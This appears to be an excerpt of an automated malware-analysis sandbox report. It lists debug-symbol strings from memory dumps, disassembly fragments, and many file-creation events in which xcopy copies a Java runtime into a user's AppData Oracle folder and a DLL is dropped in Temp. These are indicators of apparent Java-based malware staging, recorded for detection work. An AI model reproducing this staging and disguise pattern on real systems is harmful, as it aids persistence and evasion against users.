        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libverify\verify.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsdt\jsdt.pdb source: xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjaas\jaas_nt.pdb source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pcsc\j2pcsc.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005000000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libkrb5\w2k_lsa_auth.pdb source: xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: d:\a01\_work\38\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: xcopy.exe, 00000015.00000003.1741105307.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawtaccessbridge-32\JAWTAccessBridge-32.pdb source: xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jabswitch\jabswitch.pdb,,+ source: xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700108241.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2gss\j2gss.pdb source: xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjawt\jawt.pdb source: xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsspi_bridge\sspi_bridge.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1698710106.00000000004DC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libj2pkcs11\j2pkcs11.pdb## source: xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\liblcms\lcms.pdb11 source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnpt\npt.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1700293859.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A707000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libsplashscreen\splashscreen.pdb source: xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: xcopy.exe, 00000015.00000003.1699288851.00000000004DD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libt2k\t2k.pdb:: source: xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005052000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000502A000.00000004.00000800.00020000.00000000.sdmp
        Source: msvcp140.dll.21.dr Static PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A945FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_73A945FB
        Source: unpack200.exe.21.dr Static PE information: section name: .00cfg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFA21B push ecx; ret 2_2_02DFA225
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFA20A push ecx; ret 2_2_02DFA21A
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFB3B7 push 00000000h; mov dword ptr [esp], esp 2_2_02DFB3DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFBB67 push 00000000h; mov dword ptr [esp], esp 2_2_02DFBB8D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFB947 push 00000000h; mov dword ptr [esp], esp 2_2_02DFB96D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_02DFC477 push 00000000h; mov dword ptr [esp], esp 2_2_02DFC49D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FC5E6 pushad ; retf 6_3_156FC5ED
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FCB90 pushad ; retf 6_3_156FCB91
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FCA72 push eax; retf 6_3_156FCA85
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FC61A pushad ; retf 6_3_156FC679
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FE8EA pushad ; retf 6_3_156FE8F9
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_156FE8A2 pushad ; retf 6_3_156FE8B1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_1512832A pushad ; iretd 6_3_15128341
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_151299DC pushad ; retf 0028h 6_3_151299DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_3_15129AE3 push eax; retf 6_3_15129B0D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73A92E75 push ecx; ret 6_2_73A92E88
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02978A11 push cs; retf 6_2_02978A31
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02981F88 push es; retn 0024h 6_2_02981F8B
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_0297ECE0 pushfd ; iretd 6_2_0297ECE1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_0297D5FB push es; retn 0001h 6_2_0297D6FF
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DD8F7 push 00000000h; mov dword ptr [esp], esp 6_2_028DD921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DA20A push ecx; ret 6_2_028DA21A
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DA21B push ecx; ret 6_2_028DA225
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DB3B7 push 00000000h; mov dword ptr [esp], esp 6_2_028DB3DD
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DBB67 push 00000000h; mov dword ptr [esp], esp 6_2_028DBB8D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DD8E0 push 00000000h; mov dword ptr [esp], esp 6_2_028DD921
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DB947 push 00000000h; mov dword ptr [esp], esp 6_2_028DB96D
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_028DC477 push 00000000h; mov dword ptr [esp], esp 6_2_028DC49D
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
